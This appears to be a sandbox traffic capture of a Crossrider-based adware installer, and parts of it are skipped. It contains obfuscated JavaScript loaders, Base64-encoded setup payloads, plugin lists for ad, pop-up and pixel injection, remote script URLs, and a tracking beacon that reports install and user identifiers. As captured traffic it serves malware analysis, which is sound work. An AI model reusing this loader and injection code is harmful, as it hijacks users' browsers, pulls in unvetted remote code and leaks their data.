    ETag: "1450608516"

    Last-Modified: Sun, 20 Dec 2015 10:48:36 GMT

    Cache-Control: max-age=437

    Content-Length: 11146

    Content-Type: application/x-javascript; charset=UTF-8

    X-HW: 1456422149.dop006.fr7.t,1456422148.cds012.fr7.c

    (function(){var a=(function(){var l=function(){return appAPI&&appAPI.installer&&appAPI.utils.isFunction(appAPI.installer.getAdditionalInfo)?appAPI.installer.getAdditionalInfo():null;};var j={ie:"10",ni:"11",te:"19",ch:"20",to:"26",sb:"27",op:"28",tc:"29",ff:"30",tf:"39",sf:"40",nv:"50",ms:"51",mf:"52",mc:"53",np:"54",sm:"55",fm:"56",cm:"57",mx:"60"};var p="source_id";var k="776";var e="__PageActive__";var q=new Date(2013,0,1);var f=1000*60*2;var n=1000*60*10;var o=(appAPI&&appAPI.installer&&typeof appAPI.installer.getUnixTime==="function")?appAPI.installer.getUnixTime()*1000:((new Date(2013,0,1)).getTime());var h=l;var g=[{pluginId:288,httpUrl:"hXXp://istatic.eshopcomp.com/fo/min/crqc.js?hid=__CROSSRIDER_USER_ID__&bname=__CROSSRIDER_APP_NAME__&subid=__CROSSRIDER_EXTENDED_SUB_ID__",httpsUrl:"hXXps://istatic.eshopcomp.com/fo/min/crqc.js?hid=__CROSSRIDER_USER_ID__&bname=__CROSSRIDER_APP_NAME__&subid=__CROSSRIDER_EXTENDED_SUB_ID__",delay:0},{pluginId:242,httpUrl:"http://inst.shoppingate.info/js/sg_bg.js?AFFILIATE_ID=crsrdr&SUB_DISTRIBUTER_ID=__CROSSRIDER_EXTENDED_SUB_ID__&BRAND_DISPLAY_NAME=__CROSSRIDER_APP_NAME__",httpsUrl:"hXXps://inst.shoppingate.info/js/sg_bg.js?AFFILIATE_ID=crsrdr&SUB_DISTRIBUTER_ID=__CROSSRIDER_EXTENDED_SUB_ID__&BRAND_DISPLAY_NAME=__CROSSRIDER_APP_NAME__",delay:0},{pluginId:385,httpUrl:"http://api.jollywallet.com/affiliate/client?dist=329&sub=__CROSSRIDER_EXTENDED_SUB_ID__&name=__CROSSRIDER_APP_NAME__",httpsUrl:"hXXps://api.jollywallet.com/affiliate/client?dist=329&sub=__CROSSRIDER_EXTENDED_S

    <<< skipped >>>

    GET /plugins/mins/354.js?ver=2&rnd=8467 HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    Host: js.newcloudrack.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:28 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1418039174"

    Last-Modified: Mon, 08 Dec 2014 11:46:14 GMT

    Cache-Control: max-age=535

    Content-Length: 122978

    Content-Type: application/x-javascript; charset=UTF-8

    X-HW: 1456422149.dop006.fr7.t,1456422148.cds054.fr7.c

    __CTG_MAPPING__={"1":["d908e50170d7cb46a92fdbff0d73bb5d","0a64c81275732dcf0eb51fc0fdecfaa7","edb18644366c10cc24c58f6fb14ca9f4","15e39ed909ac8e17ae3cc3c91cd7ae9f","dccefc9affe37ba60b49d0a4789ce042","55a7d0f3833487778c3bdff8b2096e93","0212ae9fc1eeb53f9f641335b804d75e","d5e783fe22abe91aae7179d10a958497","9c8a818246bc677ef54725340e9c5a98","6871592501ed31709e241750c4363fce","1c5e3f677b22b8257c1df15a70e7df26","daf4c4488123ddadb30a7adaadb18b54","11fbd0aa23a016619379552c438b081a","fcaed5b82116cd700a0949772ad8ff49","6ac10c5f77cf4309c731a1edca41f357","5c83bc2a9fe11b248ee7a0577c7d8fdd","b4724ce8e3ac8d971ea648c70f1f3a28","5cfdb867e96374c7883b31d6928cc4cb","5bc25469aea12b844db6b49146c3e0ed","15830c2f3218394a63d70b23d235cc1c","7f5e73ea77ef99619089c3857dafdcb4","029c1c42a9160c3cf3db1a687f11ff72","e84400c002083678aa69041045895fae","da0239e7da0330fb26ef37dd1d940044","993439d6f7a4548cae1381c9073cbee1","24414caa6316a5694f77499fa604e5b1","340d70f50a7a4507bc874c8108bb45bc","2e44b2f1bf1b2b87d2be9f94ad2a2a35","5484845885ffd608ebb0ad1ac39434d4","96eb5194f361b233bf8fb9a80267f1de","91e4f116b8a4f5258b982d3c10910bdf","5638298177fc6af5190590244d6d8035","7712b7ac7ec5d5966fb35b1425d0283f","1080cee006e84c91858613ce7dde99fb","428d0f3d623a15db6cacb689e86b4352","8b25ca5c09e10312a1567fb3d7f82c07","84dcb17eaafb9d32908759a607838c8b","fcbed3a6b1e592c8efddf3f925b26b7f","7eae142b683afcf5aee231291c679877","9bcd814058bcf8f6497f0495e0a2fd71","6bb8719fca4581212b3aa47da8755163","adb2121658b69c9a701f270c8faba02f","5694f231cd01d8222d59557c56cef9a7","b7444e18

    <<< skipped >>>

    GET /plugins/mins/345.js?ver=47&rnd=8467 HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    Host: js.newcloudrack.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:29 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1450797163"

    Last-Modified: Tue, 22 Dec 2015 15:12:43 GMT

    Cache-Control: max-age=900

    Content-Length: 781

    Content-Type: application/x-javascript; charset=UTF-8

    X-HW: 1456422149.dop006.fr7.t,1456422149.cds047.fr7.c

    __INFORMATION_MAPPING__={ads:[101,108,116,117,125,126,135,141,158,159,170,171,174,178,180,192,193,206,211,225,230,231,232,233,239,241,261,264,266,279,284,289,297,300,302,306,309,310,314,333,334,339,340,344,363,368,372,374,379,387,388,393,399,408,410,413,415,416,418,421,424,437,446,452],pops:[108,127,155,170,179,190,195,197,208,221,224,265,273,277,278,280,281,292,293,294,296,262,303,324,337,338,341,343,346,347,356,357,358,390,396,401,423,436,439,440,450,459],intext:[103,117,123,142,259,263,342,359,360,391,402,442],shopping:[92,93,102,104,117,124,128,138,184,191,198,199,200,204,213,215,218,223,227,228,234,235,237,242,243,256,260,254,275,282,288,290,295,301,304,307,308,311,317,325,327,328,335,350,351,369,370,371,375,385,389,397,409,411,412,414,419,441,443,444,451,453,457]};....

    GET /plugins/mins/246.js?ver=17&rnd=8467 HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    Host: js.newcloudrack.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:29 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1424173488"

    Last-Modified: Tue, 17 Feb 2015 11:44:48 GMT

    Cache-Control: max-age=682

    Content-Length: 7448

    Content-Type: application/x-javascript; charset=UTF-8

    X-HW: 1456422149.dop006.fr7.t,1456422149.cds059.fr7.c

    var _0x8f59=["10","11","19","20","26","27","28","29","30","39","40","50","51","52","53","54","55","56","57","60","installer","getAdditionalInfo","isFunction","utils","isDefined","asw","isArray","length","toLowerCase","platform","np","ni","browser_name","__BROWSER_NAME__","getIds","installer_verifier","","string","charCodeAt","replace","match","apply","fromCharCode","Base64","decode","call","parse","JSON","monetization","internal","plugins","un","def","ined","pluginId","getExtendedSubId","function","slice","getSubId","getTime","_","join","na","httpUrl","__RND__","g","__ADVANCE_USER__","__CROSSRIDER_ASW__","__CROSSRIDER_INSTALL_TIME__","getUnixTime","__CROSSRIDER_COUNTRY_CODE__","getCountry","__CROSSRIDER_EXTENDED_SUB_ID__","__CROSSRIDER_USER_ID__","userId","appInfo","__CROSSRIDER_VERIFIER__","__CROSSRIDER_INSTALLER_USER_ID__","getUserId","__CROSSRIDER_APP_ID__","appID","__CROSSRIDER_BROWSER__","__CROSSRIDER_CAMP_ID__","getCampaignId","__CROSSRIDER_LIGHT_SUB_ID__","__CROSSRIDER_APP_NAME__","name","__CROSSRIDER_SUB_ID__","httpsUrl","inlineJS","waitForBodyReady","undefined","addRemoteJS"];setup2=function(m,k){var h={ie:_0x8f59[0],ni:_0x8f59[1],te:_0x8f59[2],ch:_0x8f59[3],to:_0x8f59[4],sb:_0x8f59[5],op:_0x8f59[6],tc:_0x8f59[7],ff:_0x8f59[8],tf:_0x8f59[9],sf:_0x8f59[10],nv:_0x8f59[11],ms:_0x8f59[12],mf:_0x8f59[13],mc:_0x8f59[14],np:_0x8f59[15],sm:_0x8f59[16],fm:_0x8f59[17],cm:_0x8f59[18],mx:_0x8f59[19]},i=function(){return appAPI[_0x8f59[20]]&&appAPI[_0x8f59[23]][_0x8f59[22]](appAPI[_0x8f59[20]][_0x8f59[21]])?appAPI[

    <<< skipped >>>

    GET /plugin/apps/64755/manifest/1_35_09_29/ie6/manifest.xml?ver=43&rnd=3029 HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    Host: js.newdemoonlinecloud.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:26 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1456422146"

    Last-Modified: Thu, 25 Feb 2016 17:42:26 GMT

    Cache-Control: private, must-revalidate, max-age=0

    Content-Length: 1681

    Content-Type: application/xml; charset=utf-8

    X-HW: 1456422146.dop001.fr7.t,1456422146.cds047.fr7.p

    <?xml version="1.0" encoding="UTF-8"?>.<CrAppInfo>. <Ver>151</Ver>. <ShortName>winservice86</ShortName>. <Description>winservice</Description>. <PublisherName>Corporate Inc</PublisherName>. <HomePageLink>NA</HomePageLink>. <JSLink>hXXp://js.newcloudrack.com/plugin/apps/64755/js/na/ie/app_code.js</JSLink>. <GroupID>0</GroupID>. <Domain>NA</Domain>. <RunInIframe>false</RunInIframe>. <ThanksURL>NA</ThanksURL>. <EmailSignature>NA</EmailSignature>. <SettingsURL>NA</SettingsURL>. <CertifiedInstall>NA</CertifiedInstall>. <ExposeSites>NA</ExposeSites>. <RemoteFBApiURL>NA</RemoteFBApiURL>. <DisableIE>true</DisableIE>. <DisableFF>true</DisableFF>. <EnableSearchIE>false</EnableSearchIE>. <EnableSearchFF>false</EnableSearchFF>. <AddressbarIE>NA</AddressbarIE>. <AddressbarFF>NA</AddressbarFF>. <AddressbarFFEnhanced>NA</AddressbarFFEnhanced>. <AddressbarCR>NA</AddressbarCR>. <NewTabURL>NA</NewTabURL>. <NewTabEmbed>NA</NewTabEmbed>. <OpenSearchURL>NA</OpenSearchURL>. <BackgroundJS>hXXp://js.newcloudrack.com/plugin/apps/64755/bg/na/ie/bg_code.js</BackgroundJS>. <BackgroundVer>17</BackgroundVer>. <Manifest>NA</Manifest>. <ChangePrevious>fa

    <<< skipped >>>

    GET /stats.gif?action=daily&app=64755&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&ver=1_35_09_29&installtime=1456422014&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=002201&subid=0&zdata=0&appver=151&bgver=17&pluginsver=128&curtime=1456422037&lifetime=23&rnd=3481 HTTP/1.1

    Accept: */*

    Host: stats.newdemoonlinecloud.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    x-amz-id-2: DlPZOvBoJzIz/WFxryltbeCWhjeZWYMKP8KB2vlHmB8ORsxqa5/niF5PGR1hgMPzu5Zh9zWShvk=

    x-amz-request-id: C02D4ECBCD887647

    Date: Thu, 25 Feb 2016 17:42:35 GMT

    Expires: Mon, 26 Jul 1997 05:00:00 GMT

    Cache-Control: no-cache, must-revalidate

    Last-Modified: Tue, 25 Feb 2014 00:06:38 GMT

    ETag: "28d6814f309ea289f847c69cf91194c6"

    Content-Type: image/gif

    Content-Length: 35

    Server: AmazonS3

    GIF89a.............,...........D..;..

    GET /COMODOCodeSigningCA2.crl HTTP/1.1

    Accept: */*

    User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

    Host: crl.comodoca.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    Pragma: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:22 GMT

    Content-Type: application/x-pkcs7-crl

    Transfer-Encoding: chunked

    Connection: keep-alive

    Set-Cookie: __cfduid=d02ba43ed8f4a94da5de304b643a54a3b1456422142; expires=Fri, 24-Feb-17 17:42:22 GMT; path=/; domain=.comodoca.com; HttpOnly

    Last-Modified: Wed, 24 Feb 2016 21:13:33 GMT

    ETag: W/"56ce1cfd-11987"

    X-CCACDN-Mirror-ID: h6edcacrl9

    Cache-Control: public, max-age=14400

    CF-Cache-Status: HIT

    Expires: Thu, 25 Feb 2016 21:42:22 GMT

    Server: cloudflare-nginx

    CF-RAY: 27a534d5f171273e-FRA

    5ba7..0....0.......0...*.H........0{1.0...U....GB1.0...U....Greater Manchester1.0...U....Salford1.0...U....COMODO CA Limited1!0...U....COMODO Code Signing CA 2..160224211333Z..160228211333Z0....0".........=...[...<...110824203440Z0".....[..x.Ik.M..ud...110825114542Z0!..Y\7.o...p......F..110825134216Z0!..*..d.. .D>Z...bH..110825235944Z0!..v.....U...........110826180316Z0"......a...sj.........110827065611Z0"....g..?R.G.=s.......110829195328Z0!..q.?@..|f..........110829205743Z0!..<..=. :4.....|Sk..110830163519Z0"....3.>&.=.&.QB.z....110830195540Z0".....W...p.~.....0T..110901131432Z0!...c:6`....V ...}...110901131823Z0".........<.....J.....110901152743Z0!..M....A...=...z.Z..110901185932Z0".........b........y..110901212800Z0"....,..p.....;.@.0...110902154630Z0".....8...b8..}.CO....110902175624Z0"....v.<u\...`....^...110902194811Z0!.. gR`..k}.0c....7..110902205032Z0"....#.y...}[.^.=.. ..110905122329Z0"....8l.q.x.....<..K..110905140709Z0!....=...oHF<v..O....110906095658Z0!..(..j.z5..p.....n..110906140412Z0"....=A.w.p...........110907092516Z0!..5....r..R.a..4....110907092609Z0!.........D..).^.'...110907092655Z0!..[....1............110907132010Z0".......3Ee....p-.....110908132554Z0!..A.v...GR..JJ)c.b..110909093345Z0"....b..T..]..........110910043824Z0"....f.......T.V.N{9..110910044920Z0!..,......h.L.T.|.U..110912173144Z0"....-...D,.UM...O.V..110912173717Z0!.. b......f..j.p.^..110913094740Z0!..Jc...RX.lp!.......110913102919Z0!..R..A.z{~.X...B....110913165335Z0!..>......b|...Rw.g..110914090437Z0!

    <<< skipped >>>

    GET /plugin/apps/64755/js/na/ie/app_code.js?ver=151&rnd=6315 HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    Host: js.newcloudrack.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:26 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1452026982"

    Last-Modified: Tue, 05 Jan 2016 20:49:42 GMT

    Cache-Control: max-age=900

    Content-Length: 617

    Content-Type: application/x-javascript; charset=UTF-8

    X-HW: 1456422147.dop015.fr7.t,1456422146.cds062.fr7.pr

    .. /************************************************************************************. This is your Page Code. The appAPI.ready() code block will be executed on every page load.. For more information please visit our docs site: hXXp://docs.crossrider.com.*************************************************************************************/..appAPI.ready(function($) {.. // Place your code here (you can also define new functions above this scope). // The $ object is the extension's jQuery object.. // alert("My new Crossrider extension works! The current page is: " document.location.href);..});......

    GET /plugin/apps/64755/bg/na/ie/bg_code.js?ver=17&rnd=9830 HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    Host: js.newcloudrack.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:27 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1452026982"

    Last-Modified: Tue, 05 Jan 2016 20:49:42 GMT

    Cache-Control: max-age=900

    Content-Length: 432

    Content-Type: application/x-javascript; charset=UTF-8

    X-HW: 1456422147.dop015.fr7.t,1456422147.cds009.fr7.pr

    ../************************************************************************************. This is your background code.. For more information please visit our wiki site:. hXXp://docs.crossrider.com/#!/guide/scopes_background.*************************************************************************************/..appAPI.ready(function($) {.. // Place your code here (ideal for handling browser button, global timers, etc.)..});......

    GET /plugin/apps/64755/plugins/na/ie/plugins.json?ver=128&rnd=5028 HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    Host: js.newcloudrack.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:28 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1452026983"

    Last-Modified: Tue, 05 Jan 2016 20:49:43 GMT

    Cache-Control: max-age=900

    Content-Length: 15403

    Content-Type: text/plain; charset=UTF-8

    X-HW: 1456422148.dop015.fr7.t,1456422148.cds060.fr7.pr

    {.."plugins_version": 128,.."plugins_list":. [. {"id":4,"url":"hXXp://js.newcloudrack.com/plugins/javascripts/jquery-1_7_1_min.js","ver":5,"name":"jquery_1_7_1","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":true,"px":true},"targets":[{"run_at":1,"order":10200},{"run_at":0,"order":100},{"run_at":5,"order":100},{"run_at":2,"order":10200}],"enabled":true},{"id":2,"url":"hXXp://js.newcloudrack.com/plugins/mins/2.js","ver":2,"name":"ie8_fix_1","browsers":{"ie":true,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targets":[{"run_at":1,"order":10100},{"run_at":2,"order":10100}],"enabled":true},{"id":3,"url":"hXXp://js.newcloudrack.com/plugins/mins/3.js","ver":2,"name":"ie8_fix_2","browsers":{"ie":true,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targets":[{"run_at":1,"order":10300},{"run_at":2,"order":10300}],"enabled":true},{"id":47,"url":"hXXp://js.newcloudrack.com/plugins/mins/47.js","ver":3,"name":"resources_background","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":false,"px":false},"targets":[{"run_at":0,"order":30000},{"run_at":5,"order":30000}],"enabled":true},{"id":246,"url":"hXXp://js.newcloudrack.com/plugins/mins/246.js","ver":17,"name":"setup","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":true,"px":true},"targets":[{"run_at":0,"order":5},{"run_at":1,"order":5}],"enabled":true},{"id":253,"url":"hXXp://js.newcloudrack.com/plugins/mins/253.js","ver":2,"name":"pixel_inject","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":true,"px":true},"tar

    <<< skipped >>>

    GET /plugins/mins/390.js?ver=1&rnd=41 HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    Host: js.newcloudrack.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:28 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1425996283"

    Last-Modified: Tue, 10 Mar 2015 14:04:43 GMT

    Cache-Control: max-age=900

    Content-Length: 823

    Content-Type: application/x-javascript; charset=UTF-8

    X-HW: 1456422148.dop015.fr7.t,1456422148.cds072.fr7.c

    if (typeof setup2 === 'function') { setup2('MGQ2ZDY4NWEwYzFmMTMxNTNiMDMxYTQ1NWI1ODQ2MDMxMzExMWU0YjU5NDgwMjFjMGEwODA2MDYwNjE0NWIwNjRmMTkwZjBhMGEwNDA3MTkxMjQ5MGYxZDEwNDQxNDEwMGM1ZTFlNTc1ODQwNTYwOTAyNGEzMTJlMzUzNTJlMmIzNzM5MmUyMTJiMjMyOTIyMzkyYzIxMjUyMzIwMmEyZTI1MzIyMzI3MmQyZjM4M2E0MTFkNTgwZDEyNDcxNDAyMDM1ODVjNDM0ZjUyNDcxZDFjMWY1YTNhMzEzMjI0MjgzMjJiMzYyMjIzMjAzYzJlMzczNzMxMjcyYTJhMmEyMDMxMmU1NDRiNmI3MTQ2MDMxMzExMWUwMjIzMTUwZDVhNWU0YjQ1MGQxYTA1MDYxNDViNTc0YjA4MDMwYjBkMTAxNTBmMDQ1NTA1NDUwNjBlMGYxYzE3MGUwOTFjNGEwNTAyMTE0MTAyMDMwNTRlMTA1NDUyNWY1NzBjMTQ1OTM4M2UzYjM2MjQzNDM2M2MzODMyMjIzMzI3MjEzMzMzMjAyMDM1MzMyMzNlMmIzMTI5MzgyYzJhMmUyOTQ4MGQ1NjBlMTg1ODE1MDcxNTRiNTU1MzQxNTE0ZDAyMWQxYTRjMjkzODIyMmEyYjM4MzQzNzI3MzUzMzM1M2UzOTM0M2IzODJiMmYzYzMzMzgzZTVhNDg2MTZlNDcxZTFkMDMwMDA4MTYyZDBmNDU1ZjRlNDI0ZjU3NmIwNQ==', 'vgaxdkgenq'); }....

    GET /plugins/mins/391.js?ver=1&rnd=41 HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    Host: js.newcloudrack.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:28 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1426068985"

    Last-Modified: Wed, 11 Mar 2015 10:16:25 GMT

    Cache-Control: max-age=900

    Content-Length: 795

    Content-Type: application/x-javascript; charset=UTF-8

    X-HW: 1456422148.dop015.fr7.t,1456422148.cds072.fr7.c

    if (typeof setup2 === 'function') { setup2('MTk0YjAwMWYwMTE3MmQxYTFlNTM1ODRiMDAxZjAxMTc0MjQ3NWQxMjA2MDcwYjBhMTYwZjFkNDUxMzVmMDMwMjA5MDYxNDBlMTAwYzVjMWYwNzFkNDcxODAwMDU1NzAwNDI0ODVhNWIwYTBlNWEzODI3MmIyMDNlMzEzYTNhMjIzMTIyMmEzNzM3MjkzNjJjMjYyZjMwMjMyNzNiMjczMzNkMjAyYzM0MmE0ODE0NDYxODAyNWQxOTAxMGY0ODU1NGE1MTQ2NTcwNzExMWM1NjJhMzgzYjNhM2QyMjMxM2IyMTJmMzAzNTI3MjkyMjIxM2QyNzI5MjYzMDM4Mjc0YTVlNTMwYTFkMWMxYjA2MzIwYTA0NTA0YjQwMDExYzFmMDUxNDQyNDc1ZDEyMDYwNzBiMGExNjBmMWQ0NTEzNWYwMzAyMDkwNjE0MGUxMDBjNWMxZjA3MWQ0NzE4MDAwNTU3MDA0MjQ4NWE1YjBhMGU1YTM4MjcyYjIwM2UzMTNhM2EyMjMxMjIyYTM3MzcyOTM2MmMyNjJmMzAyMzI3M2IyNzMzM2QyMDJjMzQyYTQ4MTQ0NjE4MDI1ZDE5MDEwZjQ4NTU0YTUxNDY1NzA3MTExYzU2MmEzODNiM2EzZDIyMzEzYjIxMmYzMDM1MjcyOTIyMjEzZDI3MjkyNjMwMzgyNzRhNWU1MzEyMDUxZDBjMWMwOTMxMGM1MDRiNTE1MDU5MTY=', 'bihkugxhrq'); }....

    GET /plugins/mins/200.js?ver=6&rnd=41 HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    Host: js.newcloudrack.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:28 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1439709638"

    Last-Modified: Sun, 16 Aug 2015 07:20:38 GMT

    Cache-Control: max-age=900

    Content-Length: 887

    Content-Type: application/x-javascript; charset=UTF-8

    X-HW: 1456422148.dop015.fr7.t,1456422148.cds054.fr7.c

    if (typeof setup2 === 'function') { setup2('MGM2ZDZhNGUxMTAyMWUxZjI0MWYxYjQ1NTk0YzViMWUxZTFiMDE1NzU4NDgxMTE5MTUxMzE5NDEwMjA0MWEwZTBmMGQwYjEyMGYwZTFkMWU1OTA5MDYxODU2MDA1YjQxNDE0MjAwMGYwYTE4MWMxYTAzMWMwNTQyNDY1NzU0NWM1NjI5MzUyYzIzMjIyNDM0MzEyNTNkMzMzODMwMzQzNTIzMjIyZDI4M2MzMjM1M2MyNDJmMjgyZTI3MzMyNjU5MzUzMDM1MjIzYTI2MmEyMjI2Mjk1NTFmMTAxZjAzMDkwNjFlMzcxNzA3MGE0YzMyMjgyNDMxMjMyYTI1MzgyNjM1MjgyNTM4MjIzYzI5MjkyNDJlM2MyODI4Mzg0MTQwNzM3ZjQ4MDcwNTE5MDcxNDM2MWUxNTU0NTA0ZjUzMDUwMzEzMTMxZjQzNTk0NTFkMDQwMTEyMTQ0ZDFmMTAxYjAzMDMxMDFmMTMwMjAyMDAwYTU4MDQwYTA1NDIwMTU2NGQ1YzU2MDEwMjA2MDUwODFiMGUxMDE4NTY0NzVhNTg0MTQyMjgzODIwM2UzNjI1MzkzZDM4MjkzMjM1M2MyOTIxMjIyZjIxMzUyODMzMzgzMDM5M2IyOTIzMmIyZTMyNTgzODNjMjgzNjNiMmIyNjNmMzIyODU4MTMwZDBiMDIwNDBhMDMyMzE2MGEwNjUxMjYyOTI5M2QzZTNlMjQzNTJhMjgzYzI0MzUyZTIxM2QyODI5MjIyMTNjMjkzNTRkNWQ2NzdlNDUxMzAwMGMxMTAzMDEzODA5NTU1ZDQzNWU0OTQ2NjAxMg==', 'wgclyvjoqm'); }....

    GET /plugins/mins/288.js?ver=4&rnd=41 HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    Host: js.newcloudrack.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:28 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1426880306"

    Last-Modified: Fri, 20 Mar 2015 19:38:26 GMT

    Cache-Control: max-age=68

    Content-Length: 963

    Content-Type: application/x-javascript; charset=UTF-8

    X-HW: 1456422148.dop015.fr7.t,1456422148.cds041.fr7.c

    if (typeof setup2 === 'function') { setup2('MWU2NzVhNWE1NDQ1NTMxYjE5MTcxNTM4MDgxNjU2NWY1MTUxMDUxNzExMWQ0MDU1NWIwYzAyMDcwYzE3MGMwZTU0MWYwNzBkMWUwMzBlMGMwODFkNTQxOTFiMDg1ZTE1MDI0YzA4MDQxNDU1MTcxNzAwMTA0MzA5MTY1MjEyMTMxMDU4MmUyYzJlMzEyYTNlMjkyODNkMjEzNDIxMzIzNjM2MjgyODI1M2QyMTJlMmM0YjAxMGIwYzE3MWY0OTNhMmUzMDNmMmMzNjNlMjgzMzMwMjAyMzJjMmMzMzM1MzIzNDNiMzkyMDJlMmM0YjEwMTAwZjEzMWU0OTNhMmUzMDNmMmMzNjNlMjgzMzMwMjAyMzJjMjgzYjMxMjgzNDNlMzEyMTJlMjAzODIxM2EyNDNlMjUyYjQ3NWQ3OTRkNDM0NTRkNTgxMjAwMTEwMTAwMzgxMTA5NGY0MDVhNTYwZDA1MDcxZDEwNWY0MjU1MTMwNzExMTAwNzA0MDA0YjA4MDkxMjFiMTUxMjFjMDAxMzRiMGUxNTE3NWIwMzFlNWMwMDBhMGI0MjE5MDgwNTA2NWYxOTFlNWMwZDA0MWU0NzJiM2EzMjIxMjIzMDM2M2YzMzNlMzEzNzJlMjYzZTI2MzczMjMzM2UyYjNhNTcxMTAzMDIwODA4NDcyNTJiMjYyMzNjM2UzMDM3MjQzZTNmMjYzYTMwMjMzZDNjMmIyYzM3M2YyYjNhNTcwMDE4MDEwYzA5NDcyNTJiMjYyMzNjM2UzMDM3MjQzZTNmMjYzYTM0MmIzOTI2MmIyOTNmM2UyYjM2MjQzMTMyMmEyMTMyMjU1ODU4NmY1MTUzNGQ0MzQ3MWQxNjBmMTMwYzFmM2EwOTQxNWY0ZDQ4NDI0YzZmMGM=', 'emzzteqsmc'); }....

    GET /plugins/mins/339.js?ver=3&rnd=41 HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    Host: js.newcloudrack.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:28 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1425914750"

    Last-Modified: Mon, 09 Mar 2015 15:25:50 GMT

    Cache-Control: max-age=900

    Content-Length: 1079

    Content-Type: application/x-javascript; charset=UTF-8

    X-HW: 1456422148.dop015.fr7.t,1456422148.cds054.fr7.c

